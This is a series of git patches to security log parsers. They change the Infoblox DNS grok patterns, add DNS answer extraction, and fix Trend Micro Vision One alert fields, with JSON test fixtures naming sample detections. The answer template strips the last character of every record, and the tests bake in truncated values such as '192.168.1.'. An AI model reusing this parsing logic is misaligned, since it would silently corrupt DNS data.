+5,7 @@ pipeline: name: grok.match properties: output_field: message - pattern: "%{DNS_FORMERR}|%{DNS_OTHER}|%{DNS_0}|%{DNS_1}|%{DNS_2}|%{DNS_3}|%{DNS_4}|%{DNS_5}|%{DNS_6}|%{DNS_7}|%{DNS_8}|%{DNS_9}|%{DNS_10}|%{DNS_11}|%{DNS_12}|%{DNS_13}" + pattern: "%{DNS_FORMERR}|%{DNS_OTHER}|%{DNS_0}|%{DNS_1}|%{DNS_2}|%{DNS_3}|%{DNS_4}|%{DNS_5}|%{DNS_6}|%{DNS_7}|%{DNS_8}|%{DNS_9}|%{DNS_10}|%{DNS_11}|%{DNS_12}|%{DNS_13}|%{DNS_14}" custom_patterns: QUERY_FLAGS: "%{QUERY_FLAGS_RD:flags_rd}%{QUERY_FLAGS_EDNS:flags_edns}?%{QUERY_FLAGS_TCP:flags_tcp}?%{QUERY_FLAGS_DNSSEC:flags_dnssec}?%{QUERY_FLAGS_CD:flags_cd}?%{QUERY_FLAGS_DNS_SERVER_COOKIE}?%{QUERY_FLAGS_DNS_SERVER_COOKIE_WITHOUT_VALID_SERVER}?" QUERY_FLAGS_RD: '[\+\-]' @@ -28,12 +28,13 @@ pipeline: DNS_5: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query failed %{GREEDYDATA:infoblox_nios_log_dns_message}" DNS_6: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA:infoblox_nios_log_dns_before_query}\\): rewriting query name %{DATA} to '%{DATA:infoblox_nios_log_dns_after_query}', type %{DATA:dns_question_type}" DNS_7: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} %{DATA:infoblox_nios_log_dns_header_flags} \\(%{IP:server_ip}\\)" - DNS_8: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" - DNS_9: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}" - DNS_10: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*CEF:0\\|Infoblox\\|NIOS\\|%{GREEDYDATA:infoblox_nios_log_dns_version}\\|RPZ-%{DATA:dns_answers_type}\\|%{DATA:infoblox_nios_log_dns_answers_policy}\\|\\d+\\|app=DNS dst=%{IP:server_ip} src=%{IP:client_ip} spt=%{NUMBER:client_port} view=%{DATA:infoblox_nios_log_dns_view_name} qtype=%{WORD:dns_question_type} msg=%{GREEDYDATA:infoblox_nios_log_dns_message}" - DNS_11: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:repeat_message}" - DNS_12: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" - DNS_13: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_8: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:dns_records}" + DNS_9: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" + DNS_10: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_11: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*CEF:0\\|Infoblox\\|NIOS\\|%{GREEDYDATA:infoblox_nios_log_dns_version}\\|RPZ-%{DATA:dns_answers_type}\\|%{DATA:infoblox_nios_log_dns_answers_policy}\\|\\d+\\|app=DNS dst=%{IP:server_ip} src=%{IP:client_ip} spt=%{NUMBER:client_port} view=%{DATA:infoblox_nios_log_dns_view_name} qtype=%{WORD:dns_question_type} msg=%{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_12: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:dns_records}" + DNS_13: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" + DNS_14: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{GREEDYDATA:infoblox_nios_log_dns_message}" # Original pattern DNS_0: '(%{WORD:infoblox_nios_log_dns_category}: )?client ?(%{DATA}) %{IP:client_ip}#%{INT:client_port} (%{DATA}): query: %{DATA:dns_question_name} %{WORD:dns_question_class} %{WORD:dns_question_type} %{QUERY_FLAGS} \(%{IP}\)' @@ -132,7 +133,6 @@ stages: infoblox.dhcp.lease_time: "{{parse_event.message.infoblox_nios_log_dhcp_lease_time}}" infoblox.dhcp.circuit_id: "{{parse_event.message.infoblox_nios_log_dhcp_circuit_id}}" - dns.type: "query" dns.question.class: "{{parse_event.message.dns_question_class}}" dns.question.type: "{{parse_event.message.dns_question_type}}" dns.question.name: "{{parse_event.message.dns_question_name}}" @@ -143,9 +143,33 @@ stages: {% if parse_event.message.flags_rd == "+" %}"RD",{% endif %} {% if parse_event.message.flags_cd == "C" %}"CD",{% endif %} ] + - set: - network.transport: "tcp" - filter: '{{parse_event.message.flags_tcp == "T"}}' + dns.type: query + filter: '{{parse_event.message.get("response_code") == None}}' + - set: + dns.type: answer + dns.response_code: '{{parse_event.message.response_code}}' + filter: '{{parse_event.message.get("response_code") != None}}' + + - set: + dns.answers: | + [ + {%- for record in parse_event.message.dns_records.split() | batch(5) -%} + {"name": "{{record[0]}}", "ttl": {{record[1]}}, "class": "{{record[2]}}", "type": "{{record[3]}}", "data": "{{record[4][:-1]}}"}, + {%- endfor -%} + ] + filter: '{{parse_event.message.get(''dns_records'') != None}}' + + - set: + network.transport: tcp + filter: '{{parse_event.message.get("flags_tcp") != None and parse_event.message.flags_tcp == "T"}}' + - set: + network.transport: udp + filter: '{{parse_event.message.get("flags_tcp") != None and parse_event.message.flags_tcp != "T"}}' + - set: + network.transport: '{{parse_event.message.network_transport | lower }}' + filter: '{{parse_event.message.get("network_transport") != None}}' - set: infoblox.ddi.category: "{{parse_event.message.infoblox_nios_log_dns_category}}" diff --git a/Infoblox/ddi/tests/query_log_dns_2.json b/Infoblox/ddi/tests/query_log_dns_2.json index 44cae19f4..1d4135768 100644 --- a/Infoblox/ddi/tests/query_log_dns_2.json +++ b/Infoblox/ddi/tests/query_log_dns_2.json @@ -16,6 +16,9 @@ "response_code": "NXDOMAIN", "type": "query" }, + "network": { + "transport": "udp" + }, "related": { "hosts": [ "test.io" diff --git a/Infoblox/ddi/tests/query_log_dns_3.json b/Infoblox/ddi/tests/query_log_dns_3.json index 6b742fbb7..959a20d36 100644 --- a/Infoblox/ddi/tests/query_log_dns_3.json +++ b/Infoblox/ddi/tests/query_log_dns_3.json @@ -16,6 +16,9 @@ "response_code": "NXDOMAIN", "type": "query" }, + "network": { + "transport": "udp" + }, "related": { "hosts": [ "test.org" diff --git a/Infoblox/ddi/tests/query_log_dns_4.json b/Infoblox/ddi/tests/query_log_dns_4.json index 4806d5bab..e52e2b96b 100644 --- a/Infoblox/ddi/tests/query_log_dns_4.json +++ b/Infoblox/ddi/tests/query_log_dns_4.json @@ -17,6 +17,9 @@ "response_code": "NXDOMAIN", "type": "query" }, + "network": { + "transport": "udp" + }, "related": { "hosts": [ "_ldap._tcp.test.test.net" diff --git a/Infoblox/ddi/tests/query_log_dns_5.json b/Infoblox/ddi/tests/query_log_dns_5.json index bd240d9a7..126d59135 100644 --- a/Infoblox/ddi/tests/query_log_dns_5.json +++ b/Infoblox/ddi/tests/query_log_dns_5.json @@ -5,6 +5,15 @@ "expected": { "message": "client 192.168.1.1#37521: UDP: query: test.test.io IN AAAA response: NOERROR +A test.test.io. 86400 IN CNAME test.test.io.", "dns": { + "answers": [ + { + "class": "IN", + "data": "test.test.io", + "name": "test.test.io.", + "ttl": 86400, + "type": "CNAME" + } + ], "header_flags": [], "question": { "class": "IN", @@ -17,6 +26,9 @@ "response_code": "NOERROR", "type": "query" }, + "network": { + "transport": "udp" + }, "related": { "hosts": [ "test.test.io" diff --git a/Infoblox/ddi/tests/query_log_dns_6.json b/Infoblox/ddi/tests/query_log_dns_6.json index 1129be865..606b02ef2 100644 --- a/Infoblox/ddi/tests/query_log_dns_6.json +++ b/Infoblox/ddi/tests/query_log_dns_6.json @@ -5,6 +5,50 @@ "expected": { "message": "client 192.168.1.1#40432: UDP: query: test.test.org IN A response: NOERROR + test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1", "dns": { + "answers": [ + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + } + ], "header_flags": [], "question": { "class": "IN", @@ -17,6 +61,9 @@ "response_code": "NOERROR", "type": "query" }, + "network": { + "transport": "udp" + }, "related": { "hosts": [ "test.test.org" diff --git a/Infoblox/ddi/tests/query_log_dns_7.json b/Infoblox/ddi/tests/query_log_dns_7.json index b695d7a1a..ca3673036 100644 --- a/Infoblox/ddi/tests/query_log_dns_7.json +++ b/Infoblox/ddi/tests/query_log_dns_7.json @@ -16,6 +16,9 @@ "response_code": "NOERROR", "type": "query" }, + "network": { + "transport": "udp" + }, "related": { "hosts": [ "test.dev" diff --git a/Infoblox/ddi/tests/query_log_dns_8.json b/Infoblox/ddi/tests/query_log_dns_8.json index 2204069d9..72f737796 100644 --- a/Infoblox/ddi/tests/query_log_dns_8.json +++ b/Infoblox/ddi/tests/query_log_dns_8.json @@ -6,6 +6,15 @@ "message": "28-Nov-2024 15:26:27.498 client 1.2.3.4#36615: UDP: query: PD2LORA2.enim.l2 IN A response: NOERROR +A test.dev. 3600 IN A 10.56.12.201;", "@timestamp": "2024-11-28T15:26:27.498000Z", "dns": { + "answers": [ + { + "class": "IN", + "data": "10.56.12.201", + "name": "test.dev.", + "ttl": 3600, + "type": "A" + } + ], "header_flags": [], "question": { "class": "IN", @@ -16,6 +25,9 @@ "response_code": "NOERROR", "type": "query" }, + "network": { + "transport": "udp" + }, "related": { "hosts": [ "PD2LORA2.enim.l2" diff --git a/Infoblox/ddi/tests/query_log_dns_9.json b/Infoblox/ddi/tests/query_log_dns_9.json index f4a0e6e07..ae3c85ca0 100644 --- a/Infoblox/ddi/tests/query_log_dns_9.json +++ b/Infoblox/ddi/tests/query_log_dns_9.json @@ -6,6 +6,92 @@ "message": "28-Nov-2024 15:26:27.359 client 1.2.3.4#63175: UDP: query: www.bing.com IN A response: NOERROR + www.bing.com. 7072 IN CNAME www-www.bing.com.trafficmanager.net.; www-www.bing.com.trafficmanager.net. 56 IN CNAME www.bing.com.edgekey.net.; www.bing.com.edgekey.net. 7154 IN CNAME e86303.test.xxxxx.net.; e86303.test.xxxxx.net. 17 IN A 1.2.3.181; e86303.test.xxxxx.net. 17 IN A 1.2.3.173; e86303.test.xxxxx.net. 17 IN A 1.2.3.184; e86303.test.xxxxx.net. 17 IN A 1.2.3.185; e86303.test.xxxxx.net. 17 IN A 1.2.3.174; e86303.test.xxxxx.net. 17 IN A 1.2.3.183; e86303.test.xxxxx.net. 17 IN A 1.2.3.177; e86303.test.xxxxx.net. 17 IN A 1.2.3.179; e86303.test.xxxxx.net. 17 IN A 1.2.3.175;", "@timestamp": "2024-11-28T15:26:27.359000Z", "dns": { + "answers": [ + { + "class": "IN", + "data": "www-www.bing.com.trafficmanager.net.", + "name": "www.bing.com.", + "ttl": 7072, + "type": "CNAME" + }, + { + "class": "IN", + "data": "www.bing.com.edgekey.net.", + "name": "www-www.bing.com.trafficmanager.net.", + "ttl": 56, + "type": "CNAME" + }, + { + "class": "IN", + "data": "e86303.test.xxxxx.net.", + "name": "www.bing.com.edgekey.net.", + "ttl": 7154, + "type": "CNAME" + }, + { + "class": "IN", + "data": "1.2.3.181", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.173", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.184", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.185", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.174", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.183", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.177", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.179", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.175", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + } + ], "header_flags": [], "question": { "class": "IN", @@ -18,6 +104,9 @@ "response_code": "NOERROR", "type": "query" }, + "network": { + "transport": "udp" + }, "related": { "hosts": [ "www.bing.com" From a71e4ec1bc766f78582c816d8633d8b733aa7790 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 2 Dec 2024 09:54:25 +0100 Subject: [PATCH 112/150] fix(TrendMicroVisionOne): add action result --- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 1 + .../tests/test_eicar_test_file_detection.json | 1 + 2 files changed, 2 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 0353bb37b..988fe612e 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -37,6 +37,7 @@ stages: rule.id: "{{parsed_event.message.model.modelId}}" event.url: "{{parsed_event.message.model.workbenchLink}}" + event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}" - set: user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json index 5fb30866d..e503353f1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json @@ -5,6 +5,7 @@ "expected": { "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", "event": { + "action": "File quarantined", "category": [ "intrusion_detection" ], From 776dc1e17b4fd4090e082ba91cd775faf9b86f8e Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 2 Dec 2024 09:55:43 +0100 Subject: [PATCH 113/150] fix(TrendMicroVisionOne): fix workbench alert url --- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 2 +- .../tests/test_eicar_test_file_detection.json | 3 ++- .../tests/test_information_gathering.json | 3 ++- .../tests/test_internal_network_scanner.json | 3 ++- Trend Micro/trend-micro-vision-one/tests/test_process.json | 3 ++- .../trend-micro-vision-one/tests/test_project_injection.json | 3 ++- Trend Micro/trend-micro-vision-one/tests/test_registry.json | 3 ++- .../trend-micro-vision-one/tests/test_service_abuse.json | 3 ++- 8 files changed, 15 insertions(+), 8 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 988fe612e..d672e2a64 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -36,7 +36,7 @@ stages: rule.name: "{{parsed_event.message.model}}" rule.id: "{{parsed_event.message.model.modelId}}" - event.url: "{{parsed_event.message.model.workbenchLink}}" + event.url: "{{parsed_event.message.workbenchLink}}" event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}" - set: diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json index e503353f1..53813871b 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json @@ -13,7 +13,8 @@ "reason": "Eicar Test File Detection", "type": [ "info" - ] + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" }, "@timestamp": "2024-11-26T16:51:29Z", "file": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json index 4d60422b4..edbe26be4 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json @@ -12,7 +12,8 @@ "reason": "Potential Information Gathering", "type": [ "info" - ] + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" }, "@timestamp": "2024-11-26T16:48:06Z", "host": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index 5b8dbfc95..d15f28c6f 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -12,7 +12,8 @@ "reason": "Internal Network Scanner", "type": [ "info" - ] + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509" }, "@timestamp": "2024-07-23T14:46:11Z", "file": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 9a41ea92c..3c77d1afd 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -12,7 +12,8 @@ "reason": "Credential Dumping via Mimikatz", "type": [ "info" - ] + ], + "url": "https://THE_WORKBENCH_URL" }, "@timestamp": "2022-09-06T02:49:30Z", "file": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json index dbeed8e8e..a95ac7fc8 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json @@ -12,7 +12,8 @@ "reason": "Process Injection from Windows Temporary Location to System32", "type": [ "info" - ] + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3" }, "@timestamp": "2024-07-23T07:49:48Z", "host": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 61b294270..6598afe24 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -12,7 +12,8 @@ "reason": "Privilege Escalation via UAC Bypass", "type": [ "info" - ] + ], + "url": "https://THE_WORKBENCH_URL" }, "@timestamp": "2022-09-06T02:49:31Z", "container": { diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json index e3283fe41..a9a7d3d7c 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json @@ -12,7 +12,8 @@ "reason": "Possible Web Service Abuse", "type": [ "info" - ] + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" }, "@timestamp": "2024-11-26T16:45:28Z", "action": { From f27eab62f8c6c3b3437d951d4e9608aef80ffa05 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 2 Dec 2024 10:00:00 +0100 Subject: [PATCH 114/150] refactor(TrendMicro): change the name of the format --- .../CHANGELOG.md | 0 .../_meta/fields.yml | 0 .../_meta/logo.png | Bin .../_meta/manifest.yml | 5 +++-- .../_meta/smart-descriptions.json | 0 .../ingest/parser.yml | 2 +- .../tests/test_eicar_test_file_detection.json | 0 .../tests/test_information_gathering.json | 0 .../tests/test_internal_network_scanner.json | 0 .../tests/test_process.json | 0 .../tests/test_project_injection.json | 0 .../tests/test_registry.json | 0 .../tests/test_service_abuse.json | 0 13 files changed, 4 insertions(+), 3 deletions(-) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/CHANGELOG.md (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/fields.yml (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/logo.png (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/manifest.yml (73%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/smart-descriptions.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/ingest/parser.yml (99%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_eicar_test_file_detection.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_information_gathering.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_internal_network_scanner.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_process.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_project_injection.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_registry.json (100%) rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_service_abuse.json (100%) diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md similarity index 100% rename from Trend Micro/trend-micro-vision-one/CHANGELOG.md rename to Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml similarity index 100% rename from Trend Micro/trend-micro-vision-one/_meta/fields.yml rename to Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png similarity index 100% rename from Trend Micro/trend-micro-vision-one/_meta/logo.png rename to Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml similarity index 73% rename from Trend Micro/trend-micro-vision-one/_meta/manifest.yml rename to Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml index da8360194..014352012 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml @@ -1,11 +1,12 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 -name: Trend 